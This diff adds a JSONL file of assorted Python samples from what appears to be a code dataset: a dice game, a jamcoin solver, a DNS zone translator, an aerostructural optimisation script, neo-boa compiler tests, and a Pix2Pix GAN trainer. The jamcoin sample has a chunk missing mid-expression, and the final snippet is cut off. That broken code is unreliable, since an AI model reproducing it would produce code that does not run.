diff --git "a/159.jsonl" "b/159.jsonl" new file mode 100644--- /dev/null +++ "b/159.jsonl" @@ -0,0 +1,621 @@ +{"seq_id":"315695654","text":"\"\"\"programme de jeu de dés\"\"\"\n# importation des bibliothèques utiles\nimport random\nimport time\n\nprint (\"Jeu de des\")\n\n# Déclaration des dessins des dés\nValeurs_de = {\n\t\"1\": [\" ------- \",\"| |\",\"| o |\",\"| |\",\" ------- \"],\n\t\"2\": [\" ------- \",\"| o |\",\"| |\",\"| o |\",\" ------- \"],\n\t\"3\": [\" ------- \",\"| o |\",\"| o |\",\"| o |\",\" ------- \"],\n\t\"4\": [\" ------- \",\"| o o |\",\"| |\",\"| o o |\",\" ------- \"],\n\t\"5\": [\" ------- \",\"| o o |\",\"| o |\",\"| o o |\",\" ------- \"],\n\t\"6\": [\" ------- \",\"| o o |\",\"| o o |\",\"| o o |\",\" ------- \"]}\n\n# ---------------------------------------\n# ------- BOUCLE PRINCIPALE -----------\n# ---------------------------------------\nwhile True :\n\ttry :\n\t\t# Determination des deux lancers\n\t\tjoueur = random.randint(1,6)\n\t\tprint ('Votre lancer : ')\n\t\tfor ligne in range(len(Valeurs_de['1'])):\n\t\t\tprint(Valeurs_de[str(joueur)][ligne])\n\t\tfeather = random.randint(1,6)\n\t\tprint ('Au tour de la carte Feather...')\n\t\ttime.sleep(2)\n\t\tfor ligne in range(len(Valeurs_de['1'])):\n\t\t\tprint(Valeurs_de[str(feather)][ligne])\n\t\t# Determination du gagnant\n\t\tif joueur > feather :\n\t\t\tprint ('Vous gagnez !!')\n\t\telif joueur < feather :\n\t\t\tprint ('Vous perdez !!')\n\t\telse :\n\t\t\tprint ('Match nul...')\n\t\t# Demande pour rejouer\n\t\tnouvelle_partie = str(input('Voulez-vous rejouer (o/n) ?'))\n\t\tnouvelle_partie = nouvelle_partie.upper()\n\t\tif nouvelle_partie != 'O' :\n\t\t\tbreak\n\texcept KeyboardInterrupt :\n\t\tprint (\"Au revoir...\")\n\t\tbreak\n","sub_path":"Chapitre_3/Code/6-3-2/code_v2.py","file_name":"code_v2.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"338742410","text":"#!/usr/bin/env python\nimport sys\nfrom operator import add\nfrom functools import reduce\nfrom itertools import combinations\n\nimport numpy as np\n\nevaluate_jam = lambda s,b: reduce(add,([int(c)*(b**(len(s)-n-1)) for n,c in enumerate(s)]))\n\n#Generate a JamCoin (a^N+1)(a^n1 + a^n2 + ... 
+ 1)\ndef generateJam(N,K,k):\n\n\t#Safety check\n\tassert (k=ndraws:\n\t\t\treturn combos[:ndraws]\n\n\n#####################\n#########Main########\n#####################\n\nline = lambda : sys.stdin.readline().strip(\"\\n\")\n\ndef main():\n\n\t#Number of test cases\n\tntest = int(line())\n\tassert ntest==1\n\n\t#Cycle over test cases\n\tfor t in range(ntest):\n\n\t\t#Read in N,J\n\t\tN,J = [int(c) for c in line().split(\" \")]\n\n\t\t#Write preamble\n\t\tsys.stdout.write(\"Case #{0}:\\n\".format(t+1))\n\n\t\t#Generate J draws for the JamCoins\n\t\tk_draws = drawk(11,J)\n\t\tfor k in k_draws:\n\t\t\tcoin,divisors = generateJam(N,N-11-1,np.array((11,)+k+(0,)))\n\t\t\tsys.stdout.write(coin + \" \" + \" \".join([ str(d) for d in divisors ]) + \"\\n\")\n\nif __name__==\"__main__\":\n\tmain()","sub_path":"solutions_5738606668808192_1/Python/apetri/coinLarge.py","file_name":"coinLarge.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"437315349","text":"import click,json\nfrom hyperdns.netdns import ZoneData\n \n\n\n@click.command()\n@click.option('--in',type=click.File('r'),default='-',help=\"File to load, or stdin\")\n@click.option('--out',type=click.File('w'),default='-',help=\"file to save, or stdout\")\n@click.option('--bind',default=False,is_flag=True,help=\"Emit bind file instead of json\")\n@click.pass_context\ndef xlate(ctx,**kwargs):\n \"\"\"Translate zone information\n \"\"\"\n \n input_data=kwargs['in'].read()\n outfile=kwargs['out']\n bind=kwargs['bind']\n try:\n jsonobject=json.loads(input_data)\n try:\n zonedata=ZoneData.fromDict(jsonobject)\n except Exception as E:\n click.echo(\"Syntactically valid, semantically invalid JSON:%s\" % E)\n raise\n \n except ValueError as E:\n try:\n zonedata=ZoneData.fromZonefileText(input_data)\n except Exception as E:\n click.echo(\"Failed to process input as either JSON or BIND file:%s\" % E)\n raise\n \n except Exception as E:\n click.echo(\"Failed to interpret input:%s\" % E)\n raise\n \n if bind:\n print(\"%s\" % zonedata.zonefile)\n else:\n print(\"%s\" % zonedata._as_json())\n\n","sub_path":"hyperdns/netdns/cli/xlate.py","file_name":"xlate.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"572294256","text":"for i in range(int(input())):\n x= int(input())\n if x%4==0:\n print(\"North\")\n elif x%4==1:\n print(\"East\")\n elif x%4==2:\n print(\"South\")\n else:\n print(\"West\")","sub_path":"facedir.py","file_name":"facedir.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"565551037","text":"# Run script for the continuous 3-D wing-truss optimization problem\n# Dr. John T. 
Hwang\n# Sicheng He\n# June, 2016\n\nfrom __future__ import division\nimport numpy\nimport time\n\nfrom openmdao.api import IndepVarComp, Problem, Group, ScipyOptimizer, SqliteRecorder, pyOptSparseDriver\nfrom stiffness import SysDispAug, SysDisplacements, SysCompliance, SysVolume\nfrom utils import setup_problem, writeBDF\nfrom openmdao.devtools.partition_tree_n2 import view_tree\n\n\n\nE = 100.0e9\n\n\nu1 = 0.005\nu2 = 0.995\n\ngeom_file = '../CRM_AVL/wing_coarse.avl'\nupp_file = '../airfoils/rae2822_upp.txt'\nlow_file = '../airfoils/rae2822_low.txt'\nresults_file = '../CRM_AVL/results_coarse.txt'\n\nfactor = 1\n\nxyz, nodes, elements, cons, forces, forcesArray = setup_problem(u1, u2, geom_file, upp_file, low_file, results_file,factor)\nforces /= 1.e1\n\nroot = Group()\nroot.add('comp_areas',\n IndepVarComp([('areas', 4.e-3 * numpy.ones(elements.shape[0]))]),\n promotes=['*'])\nroot.add('sys_disp_aug',\n SysDispAug(nodes, elements, forces.flatten(), cons, E),\n promotes=['*'])\nroot.add('sys_displacements',\n SysDisplacements(nodes, cons),\n promotes=['*'])\nroot.add('sys_compliance',\n SysCompliance(nodes, forces),\n promotes=['*'])\nroot.add('sys_volume',\n SysVolume(elements, numpy.ones(len(elements))),\n promotes=['*'])\n\nprob = Problem()\nprob.root = root\n#prob.root.deriv_options['type'] = 'fd'\nprob.setup()\n\nt0 = time.time()\nprob.run()\nt1 = time.time()\n\n#print t1-t0\n\nnodes0 = nodes\nnodes1 = nodes + prob['disp']\n\nwriteBDF('jig.bdf', nodes0, elements+1)\nwriteBDF('deflected.bdf', nodes1, elements+1)\n\nif 0:\n prob.check_partial_derivatives(compact_print=True)\n exit()\n\nprob.driver = pyOptSparseDriver()\nprob.driver.options['optimizer'] = \"SNOPT\"\nprob.driver.opt_settings = {'Major optimality tolerance': 1.0e-7,\n 'Major feasibility tolerance': 1.0e-7,\n 'Iterations limit': int(1e6),\n}\n\nprob.driver.add_desvar('areas',lower=0.0001, upper=0.1, scaler=1e0) # test\nprob.driver.add_objective('compliance', scaler=1e0)\nprob.driver.add_constraint('volume', upper=0.5) #0.630832724832)\n# setup data recording\nprob.driver.add_recorder(SqliteRecorder('data.db'))\nprob.setup()\n#view_tree(prob, outfile=\"aerostruct.html\", show_browser=True)\nprob.run()\n\nwriteBDF('optimized.bdf', nodes+prob['disp'], elements+1)\n","sub_path":"openmdao/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"79091822","text":"from boa3 import constants\nfrom boa3.boa3 import Boa3\nfrom boa3.model.builtin.interop.interop import Interop\nfrom boa3.neo.cryptography import hash160\nfrom boa3.neo.vm.opcode.Opcode import Opcode\nfrom boa3.neo.vm.type.Integer import Integer\nfrom boa3.neo.vm.type.String import String\nfrom boa3_test.tests.boa_test import BoaTest\nfrom boa3_test.tests.test_classes.contract.neomanifeststruct import NeoManifestStruct\nfrom boa3_test.tests.test_classes.testengine import TestEngine\n\n\nclass TestBlockchainInterop(BoaTest):\n\n default_folder: str = 'test_sc/interop_test/blockchain'\n\n def test_get_current_height(self):\n expected_output = (\n Opcode.SYSCALL\n + Interop.CurrentHeight.getter.interop_method_hash\n + Opcode.RET\n )\n\n path = self.get_contract_path('CurrentHeight.py')\n output = Boa3.compile(path)\n self.assertEqual(expected_output, output)\n\n def test_current_height_cant_assign(self):\n expected_output = (\n Opcode.INITSLOT\n + b'\\x01\\x01'\n + Opcode.LDARG0\n + Opcode.STLOC0\n + Opcode.LDLOC0\n + Opcode.RET\n )\n\n path = 
self.get_contract_path('CurrentHeightCantAssign.py')\n output = Boa3.compile(path)\n self.assertEqual(expected_output, output)\n\n def test_get_contract(self):\n from boa3.neo3.contracts import CallFlags\n call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)\n expected_output = (\n Opcode.INITSLOT\n + b'\\x00\\x01'\n + Opcode.LDARG0\n + Opcode.PUSH1\n + Opcode.PACK\n + Opcode.PUSHDATA1\n + Integer(len(Interop.GetContract.method_name)).to_byte_array(min_length=1)\n + String(Interop.GetContract.method_name).to_bytes()\n + Opcode.PUSHDATA1\n + Integer(len(constants.MANAGEMENT_SCRIPT)).to_byte_array(min_length=1)\n + constants.MANAGEMENT_SCRIPT\n + Opcode.PUSHDATA1\n + Integer(len(call_flag)).to_byte_array(min_length=1)\n + call_flag\n + Opcode.ROT\n + Opcode.ROT\n + Opcode.SYSCALL\n + Interop.CallContract.interop_method_hash\n + Opcode.RET\n )\n path = self.get_contract_path('GetContract.py')\n output = Boa3.compile(path)\n self.assertEqual(expected_output, output)\n\n engine = TestEngine()\n result = self.run_smart_contract(engine, path, 'main', bytes(20))\n self.assertIsNone(result)\n\n call_contract_path = self.get_contract_path('test_sc/arithmetic_test', 'Addition.py')\n Boa3.compile_and_save(call_contract_path)\n\n script, manifest = self.get_output(call_contract_path)\n nef, manifest = self.get_bytes_output(call_contract_path)\n call_hash = hash160(script)\n call_contract_path = call_contract_path.replace('.py', '.nef')\n\n engine.add_contract(call_contract_path)\n\n result = self.run_smart_contract(engine, path, 'main', call_hash)\n self.assertEqual(5, len(result))\n self.assertEqual(call_hash, result[2])\n self.assertEqual(nef, result[3])\n manifest_struct = NeoManifestStruct.from_json(manifest)\n self.assertEqual(manifest_struct, result[4])\n","sub_path":"boa3_test/tests/compiler_tests/test_interop/test_blockchain.py","file_name":"test_blockchain.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"7364311","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\nPATH = 'G:/공유 드라이브/Team_project/01_data/'\n\nBUFFER_SIZE = 1000\nBATCH_SIZE = 1\nIMG_WIDTH = 1280\nIMG_HEIGHT = 720\n\ndef load(image_file):\n image = tf.io.read_file(image_file)\n image = tf.image.decode_jpeg(image)\n \n image = tf.cast(image, tf.float32)\n \n return image\n\ndef resize(input_image, real_image, height, width):\n input_image = tf.image.resize(input_image, [height, width], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n real_image = tf.image.resize(real_image, [height, width], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n\n return input_image, real_image\n\ndef random_crop(input_image, real_image):\n stacked_image = tf.stack([input_image, real_image], axis=0)\n cropped_image = tf.image.random_crop(stacked_image, size=[2, IMG_HEIGHT, IMG_WIDTH, 3])\n\n return cropped_image[0], cropped_image[1]\n\n# normalizing the images to [-1, 1]\ndef normalize(input_image, real_image):\n input_image = (input_image / 127.5) - 1\n real_image = (real_image / 127.5) - 1\n\n return input_image, real_image\n\n@tf.function()\ndef random_jitter(input_image, real_image):\n # resizing to 286 x 286 x 3\n input_image, real_image = resize(input_image, real_image, 800, 1400)\n\n # randomly cropping to 256 x 256 x 3\n input_image, real_image = random_crop(input_image, real_image)\n\n if tf.random.uniform(()) 
> 0.5:\n # random mirroring\n input_image = tf.image.flip_left_right(input_image)\n real_image = tf.image.flip_left_right(real_image)\n\n return input_image, real_image\n\ndef load_image_train(image_file, real_image):\n input_image, real_image = load(image_file), load(real_image)\n input_image, real_image = random_jitter(input_image, real_image)\n input_image, real_image = normalize(input_image, real_image)\n\n return input_image, real_image\n\ndef load_image_test(image_file, real_image):\n input_image, real_image = load(image_file), load(real_image)\n input_image, real_image = resize(input_image, real_image, IMG_HEIGHT, IMG_WIDTH)\n input_image, real_image = normalize(input_image, real_image)\n\n return input_image, real_image\n\n# train_data\ninput_img = tf.data.Dataset.list_files(PATH + 'train/train_input_img/*.jpg', shuffle=False)\noutput_img = tf.data.Dataset.list_files(PATH + 'train/train_target_img/*.jpg', shuffle=False)\nprint(input_img)\nprint(output_img)\n\ntrain_dataset = tf.data.Dataset.zip((input_img, output_img))\nprint(train_dataset)\n\ntrain_dataset = train_dataset.map(load_image_train, num_parallel_calls=tf.data.experimental.AUTOTUNE)\ntrain_dataset = train_dataset.shuffle(BUFFER_SIZE)\ntrain_dataset = train_dataset.batch(BATCH_SIZE)\n\n# test_data\ninput_img = tf.data.Dataset.list_files(PATH + 'test/test_input_img/*.jpg', shuffle=False)\noutput_img = tf.data.Dataset.list_files(PATH + 'test/test_target_img/*.jpg', shuffle=False)\n\ntest_dataset = tf.data.Dataset.zip((input_img, output_img))\n\ntest_dataset = test_dataset.map(load_image_test)\ntest_dataset = test_dataset.shuffle(BUFFER_SIZE)\ntest_dataset = test_dataset.batch(BATCH_SIZE)\n\n# val_data\ninput_train_dataset = train_dataset.take(800)\ninput_val_dataset = train_dataset.skip(800)\ninput_val_dataset = input_val_dataset.take(200)\n\nprint(input_train_dataset)\nprint(input_val_dataset)\nprint(test_dataset)\n\n_, ax = plt.subplots(4, 2, figsize=(10, 15))\nfor i, (example_input, example_target) in enumerate(test_dataset.take(4)):\n ax[i, 0].imshow(example_input[0])\n ax[i, 1].imshow(example_target[0])\n ax[i, 0].set_title(\"Input image\")\n ax[i, 0].set_title(\"Input image\")\n ax[i, 1].set_title(\"Translated image\")\n ax[i, 0].axis(\"off\")\n ax[i, 1].axis(\"off\")\nplt.tight_layout()\nplt.show()\n\n\n# Modeling\nclass ReflectionPadding2D(layers.Layer):\n \"\"\"Implements Reflection Padding as a layer.\n\n Args:\n padding(tuple): Amount of padding for the\n spatial dimensions.\n\n Returns:\n A padded tensor with the same type as the input tensor.\n \"\"\"\n\n def __init__(self, padding=(1, 1), **kwargs):\n self.padding = tuple(padding)\n super(ReflectionPadding2D, self).__init__(**kwargs)\n\n def call(self, input_tensor, mask=None):\n padding_width, padding_height = self.padding\n padding_tensor = [\n [0, 0],\n [padding_height, padding_height],\n [padding_width, padding_width],\n [0, 0],\n ]\n return tf.pad(input_tensor, padding_tensor, mode=\"REFLECT\")\n\nkernel_init = keras.initializers.RandomNormal(mean=0.0, stddev=0.02)\ngamma_init = keras.initializers.RandomNormal(mean=0.0, stddev=0.02)\n\ndef residual_block(\n x,\n activation,\n kernel_initializer=kernel_init,\n kernel_size=(3, 3),\n strides=(1, 1),\n padding=\"valid\",\n gamma_initializer=gamma_init,\n use_bias=False,\n):\n dim = x.shape[-1]\n input_tensor = x\n\n x = ReflectionPadding2D()(input_tensor)\n x = layers.Conv2D(\n dim,\n kernel_size,\n strides=strides,\n kernel_initializer=kernel_initializer,\n padding=padding,\n use_bias=use_bias,\n )(x)\n x = 
layers.BatchNormalization(gamma_initializer=gamma_initializer)(x)\n x = activation(x)\n\n x = ReflectionPadding2D()(x)\n x = layers.Conv2D(\n dim,\n kernel_size,\n strides=strides,\n kernel_initializer=kernel_initializer,\n padding=padding,\n use_bias=use_bias,\n )(x)\n x = layers.BatchNormalization(gamma_initializer=gamma_initializer)(x)\n x = layers.add([input_tensor, x])\n return x\n\n\ndef downsample(\n x,\n filters,\n activation,\n kernel_initializer=kernel_init,\n kernel_size=(3, 3),\n strides=(2, 2),\n padding=\"same\",\n gamma_initializer=gamma_init,\n use_bias=False,\n):\n x = layers.Conv2D(\n filters,\n kernel_size,\n strides=strides,\n kernel_initializer=kernel_initializer,\n padding=padding,\n use_bias=use_bias,\n )(x)\n x = layers.BatchNormalization(gamma_initializer=gamma_initializer)(x)\n if activation:\n x = activation(x)\n return x\n\n\ndef upsample(\n x,\n filters,\n activation,\n kernel_size=(3, 3),\n strides=(2, 2),\n padding=\"same\",\n kernel_initializer=kernel_init,\n gamma_initializer=gamma_init,\n use_bias=False,\n):\n x = layers.Conv2DTranspose(\n filters,\n kernel_size,\n strides=strides,\n padding=padding,\n kernel_initializer=kernel_initializer,\n use_bias=use_bias,\n )(x)\n x = layers.BatchNormalization(gamma_initializer=gamma_initializer)(x)\n if activation:\n x = activation(x)\n return x\n\n\n# GENERATOR\ndef get_generator(basic_filters=64,kernel_size=4,drop_out=0.5,alpha=0,name=None):\n \n initializer = tf.random_normal_initializer(0.,0.02)\n inputs = layers.Input(shape=(720,1280,3), name=name + \"_img_input\")\n layer1 = layers.Conv2D(filters = basic_filters,kernel_size=4,strides=2,padding='same',use_bias=False,kernel_initializer=initializer)(inputs)\n layer1 = layers.LeakyReLU()(layer1)\n layer1_ = layer1\n \n layer2 = layers.Conv2D(filters=basic_filters*2,kernel_size=kernel_size,strides=2,padding='same',use_bias=False,kernel_initializer=initializer)(layer1)\n layer2_ = layers.BatchNormalization()(layer2)\n layer2 = layers.LeakyReLU()(layer2_)\n \n layer3 = layers.Conv2D(filters=basic_filters*4,kernel_size=kernel_size,strides=2,padding='same',use_bias=False,kernel_initializer=initializer)(layer2)\n layer3_ = layers.BatchNormalization()(layer3)\n layer3 = layers.LeakyReLU()(layer3_)\n \n layer4 = layers.Conv2D(filters=basic_filters*8,kernel_size=kernel_size,strides=(2,2),padding='same',use_bias=False,kernel_initializer=initializer)(layer3)\n layer4_ = layers.BatchNormalization()(layer4)\n layer4 = layers.LeakyReLU()(layer4_)\n \n layer5 = layers.Conv2D(filters=basic_filters*8,kernel_size=kernel_size,strides=(3,2),padding='same',use_bias=False,kernel_initializer=initializer)(layer4)\n layer5_ = layers.BatchNormalization()(layer5)\n layer5 = layers.LeakyReLU()(layer5_)\n \n layer6 = layers.Conv2D(filters=basic_filters*8,kernel_size=kernel_size,strides=(3,2),padding='same',use_bias=False,kernel_initializer=initializer)(layer5)\n layer6_ = layers.BatchNormalization()(layer6)\n layer6 = layers.LeakyReLU()(layer6_)\n \n layer7 = layers.Conv2D(filters=basic_filters*8,kernel_size=kernel_size,strides=(1,2),padding='same',use_bias=False,kernel_initializer=initializer)(layer6)\n layer7_ = layers.BatchNormalization()(layer7)\n layer7 = layers.LeakyReLU()(layer7_)\n \n layer8 = layers.Conv2D(filters=basic_filters*16,kernel_size=kernel_size,strides=(1,2),padding='same',use_bias=False,kernel_initializer=initializer)(layer7)\n layer8_ = layers.BatchNormalization()(layer8)\n layer8 = layers.LeakyReLU()(layer8_)\n \n # 가운데\n layer9 = 
layers.Conv2D(filters=basic_filters*16,kernel_size=kernel_size,strides=(5,5),padding='same',use_bias=False,kernel_initializer=initializer)(layer8)\n layer9_ = layers.BatchNormalization()(layer9)\n layer9 = layers.LeakyReLU()(layer9_)\n # 가운데\n \n layer10 = layers.Conv2DTranspose(filters=basic_filters*16,kernel_size=kernel_size,strides=(5,5),padding='same',kernel_initializer=initializer,use_bias=False)(layer9)\n layer10 = layers.BatchNormalization()(layer10)\n layer10 = layer10+layer8_\n layer10 = layers.Dropout(drop_out)(layer10)\n layer10 = layers.ReLU()(layer10)\n \n layer11 = layers.Conv2DTranspose(filters=basic_filters*8,kernel_size=kernel_size,strides=(1,2),padding='same',kernel_initializer=initializer,use_bias=False)(layer10)\n layer11 = layers.BatchNormalization()(layer11)\n layer11 = layer11+layer7_\n layer11 = layers.Dropout(drop_out)(layer11)\n layer11 = layers.ReLU()(layer11)\n \n layer12 = layers.Conv2DTranspose(filters=basic_filters*8,kernel_size=kernel_size,strides=(1,2),padding='same',kernel_initializer=initializer,use_bias=False)(layer11)\n layer12 = layers.BatchNormalization()(layer12)\n layer12 = layer12+layer6_\n layer12 = layers.Dropout(drop_out)(layer12)\n layer12 = layers.ReLU()(layer12)\n \n layer13 = layers.Conv2DTranspose(filters=basic_filters*8,kernel_size=kernel_size,strides=(3,2),padding='same',kernel_initializer=initializer,use_bias=False)(layer12)\n layer13 = layers.BatchNormalization()(layer13)\n layer13 = layer13+layer5_\n layer13 = layers.Dropout(drop_out)(layer13)\n layer13 = layers.ReLU()(layer13)\n \n layer14 = layers.Conv2DTranspose(filters=basic_filters*8,kernel_size=kernel_size,strides=(3,2),padding='same',kernel_initializer=initializer,use_bias=False)(layer13)\n layer14 = layers.BatchNormalization()(layer14)\n layer14 = layer14+layer4_\n layer14 = layers.Dropout(drop_out)(layer14)\n layer14 = layers.ReLU()(layer14)\n \n layer15 = layers.Conv2DTranspose(filters=basic_filters*4,kernel_size=kernel_size,strides=(2,2),padding='same',kernel_initializer=initializer,use_bias=False)(layer14)\n layer15 = layers.BatchNormalization()(layer15)\n layer15 = layer15+layer3_\n layer15 = layers.Dropout(drop_out)(layer15)\n layer15 = layers.ReLU()(layer15)\n \n layer16 = layers.Conv2DTranspose(filters=basic_filters*2,kernel_size=kernel_size,strides=(2,2),padding='same',kernel_initializer=initializer,use_bias=False)(layer15)\n layer16 = layers.BatchNormalization()(layer16)\n layer16 = layer16+layer2_\n layer16 = layers.Dropout(drop_out)(layer16)\n layer16 = layers.ReLU()(layer16)\n \n layer17 = layers.Conv2DTranspose(filters=basic_filters,kernel_size=kernel_size,strides=(2,2),padding='same',kernel_initializer=initializer,use_bias=False)(layer16)\n layer17 = layers.BatchNormalization()(layer17)\n layer17 = layer17+layer1_\n layer17 = layers.Dropout(drop_out)(layer17)\n layer17 = layers.ReLU()(layer17)\n \n outputs_ = layers.Conv2DTranspose(filters=3,kernel_size=kernel_size,strides=2,padding='same',kernel_initializer=initializer,use_bias=False,activation='tanh')(layer17)\n\n model = keras.models.Model(inputs=inputs,outputs=outputs_)\n \n return model\n\n# DISCRIMINATOR\ndef get_discriminator(\n filters=64, kernel_initializer=kernel_init, num_downsampling=5, name=None\n):\n img_input = layers.Input(shape=(720,1280,3), name=name + \"_img_input\")\n x = layers.Conv2D(\n filters,\n (4, 4),\n strides=(2, 2),\n padding=\"same\",\n kernel_initializer=kernel_initializer,\n )(img_input)\n x = layers.LeakyReLU(0.2)(x)\n\n num_filters = filters\n for num_downsample_block in 
range(5):\n num_filters *= 2\n if num_downsample_block < 4:\n x = downsample(\n x,\n filters=num_filters,\n activation=layers.LeakyReLU(0.2),\n kernel_size=(4, 4),\n strides=(2, 2),\n )\n else:\n x = downsample(\n x,\n filters=num_filters,\n activation=layers.LeakyReLU(0.2),\n kernel_size=(4, 4),\n strides=(1, 1),\n )\n\n x = layers.Conv2D(\n 1, (4, 4), strides=(1, 1), padding=\"same\", kernel_initializer=kernel_initializer\n )(x)\n\n model = keras.models.Model(inputs=img_input, outputs=x, name=name)\n return model\n\n# Get the generators\ngen_G = get_generator(name=\"generator_G\")\n# gen_F = get_generator(name=\"generator_F\")\n\n# Get the discriminators\n# disc_X = get_discriminator(name=\"discriminator_X\")\ndisc_Y = get_discriminator(name=\"discriminator_Y\")\n\ngen_G.summary()\nprint(gen_G)\n# print(gen_F)\ndisc_Y.summary()\n# print(disc_X)\nprint(disc_Y)\n\n\n\n\n# Build the Pix2Pix model\nclass Pix2Pix(keras.Model):\n def __init__(\n self,\n generator_G,\n discriminator_Y,\n LAMBDA=100\n ):\n super(Pix2Pix, self).__init__()\n self.gen_G = generator_G\n self.disc_Y = discriminator_Y\n self.LAMBDA = LAMBDA\n\n def compile(\n self,\n gen_G_optimizer,\n disc_Y_optimizer,\n gen_loss_fn,\n disc_loss_fn,\n ):\n super(Pix2Pix, self).compile()\n self.gen_G_optimizer = gen_G_optimizer\n self.disc_Y_optimizer = disc_Y_optimizer\n self.generator_loss_fn = gen_loss_fn\n self.discriminator_loss_fn = disc_loss_fn\n\n def train_step(self, batch_data):\n real_x, real_y = batch_data\n Lambda = self.LAMBDA\n with tf.GradientTape(persistent=True) as gen_tape, tf.GradientTape(persistent=True) as disc_tape:\n # Generate fake image\n fake_y = self.gen_G(real_x, training=True)\n\n # Discriminator output\n disc_real_y = self.disc_Y(real_y, training=True)\n disc_fake_y = self.disc_Y(fake_y, training=True)\n\n # Generator adverserial loss\n gen_G_loss = self.generator_loss_fn(disc_fake_y, fake_y, real_y, Lambda)\n\n # Discriminator loss\n disc_Y_loss = self.discriminator_loss_fn(disc_real_y, disc_fake_y)\n\n # Get the gradients for the generators\n grads_G = gen_tape.gradient(gen_G_loss, self.gen_G.trainable_variables)\n\n # Get the gradients for the discriminators\n disc_Y_grads = disc_tape.gradient(disc_Y_loss, self.disc_Y.trainable_variables)\n\n # Update the weights of the generators\n self.gen_G_optimizer.apply_gradients(\n zip(grads_G, self.gen_G.trainable_variables)\n )\n # Update the weights of the discriminators\n self.disc_Y_optimizer.apply_gradients(\n zip(disc_Y_grads, self.disc_Y.trainable_variables)\n )\n\n return {\n \"G_loss\": gen_G_loss,\n \"D_Y_loss\": disc_Y_loss,\n }\n\n\n\n# Loss function for evaluating adversarial loss\nloss_object = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n\n# Define the loss function for the generators\ndef generator_loss_fn(disc_generated_output, gen_output, target, LAMBDA):\n gan_loss = loss_object(tf.ones_like(disc_generated_output), disc_generated_output)\n\n # mean absolute error\n l1_loss = tf.reduce_mean(tf.abs(target - gen_output))\n\n total_gen_loss = gan_loss + (LAMBDA * l1_loss)\n\n return total_gen_loss\n\n# Define the loss function for the discriminators\ndef discriminator_loss_fn(disc_real_output, disc_generated_output):\n real_loss = loss_object(tf.ones_like(disc_real_output), disc_real_output)\n\n generated_loss = loss_object(tf.zeros_like(disc_generated_output), disc_generated_output)\n\n total_disc_loss = real_loss + generated_loss\n\n return total_disc_loss\n\n\n# Create pix2pix gan model\npix2pix_gan_model = Pix2Pix(\n 
generator_G=gen_G, discriminator_Y=disc_Y\n)\n\n# Compile the model\npix2pix_gan_model.compile(\n gen_G_optimizer=keras.optimizers.Adam(learning_rate=2e-4, beta_1=0.5),\n disc_Y_optimizer=keras.optimizers.Adam(learning_rate=2e-4, beta_1=0.5),\n gen_loss_fn=generator_loss_fn,\n disc_loss_fn=discriminator_loss_fn,\n)\n# Callbacks\ncheckpoint_filepath = \"./project/team/data/model_checkpoints_best\"\nmodel_checkpoint_callback = keras.callbacks.ModelCheckpoint(\n filepath=checkpoint_filepath,\n monitor='G_loss',\n mode='auto',\n save_best_only=True,\n verbose=1\n)\nreduce_lr = keras.callbacks.ReduceLROnPlateau(\n monitor='G_loss',\n factor=0.9,\n patience=8, \n mode='auto',\n verbose=1\n)\nearly_stopping = keras.callbacks.EarlyStopping(\n monitor='G_loss',\n patience=30,\n mode='auto'\n)\n# Here we will train the model for just one epoch as each epoch takes around\n# 7 minutes on a single P100 backed machine.\n\n# load_weights\n# weight_file = './project/team/data/model_checkpoints_ending'\n# pix2pix_gan_model.load_weights(weight_file).expect_partial()\n# print(\"Weights loaded successfully\")\n\ncount = 0\npix2pix_gan_model.fit(\n input_train_dataset,\n epochs=100,\n # callbacks=[model_checkpoint_callback], #, reduce_lr, early_stopping],\n validation_data=input_val_dataset\n)\n\npix2pix_gan_model.save_weights(\"./project/team/data/model_checkpoints_ending\")\n\n\n# Predict\n# weight_file = './project/team/data/model_checkpoints_ending'\n# pix2pix_gan_model.load_weights(weight_file).expect_partial()\n# print(\"Weights loaded successfully\")\n\n\n_, ax = plt.subplots(4, 2, figsize=(10, 15))\nfor i, (example_input, example_target) in enumerate(test_dataset.take(4)):\n prediction = pix2pix_gan_model.gen_G(example_input, training=False)[0].numpy()\n prediction = (prediction * 127.5 + 127.5).astype(np.uint8)\n example_input = (example_input[0] * 127.5 + 127.5).numpy().astype(np.uint8)\n\n ax[i, 0].imshow(example_input)\n ax[i, 1].imshow(prediction)\n ax[i, 0].set_title(\"Input image\")\n ax[i, 0].set_title(\"Input image\")\n ax[i, 1].set_title(\"Translated image\")\n ax[i, 0].axis(\"off\")\n ax[i, 1].axis(\"off\")\n\n prediction = keras.preprocessing.image.array_to_img(prediction)\n # prediction.save(\"predicted_img_{i}.png\".format(i=i))\nplt.tight_layout()\nplt.savefig('./project/team/data/predict_{}.png'.format(count))\nplt.show()\n","sub_path":"project/team/GAN/Pix2PixGAN_2.py","file_name":"Pix2PixGAN_2.py","file_ext":"py","file_size_in_byte":19074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"523221809","text":"import numpy as np \nn=int(input())\nar=np.zeros((n,n))\nk=0\nj=-1\nfor i in range(n*n):\n if(i%n==0):\n j=j+1\n if(k==n):\n k=0\n inp=input()\n ar[j,k]=inp\n k=k+1\na=int(input())\nfor i in range(0,n,a):\n for j in range(0,n,a):\n z=ar[i:i+a,j:j+a]\n average=int(np.sum(z)//(a*a))\n ar[i:i+a,j:j+a]=average\nprint(int((n*n)/(a*a)))\nprint 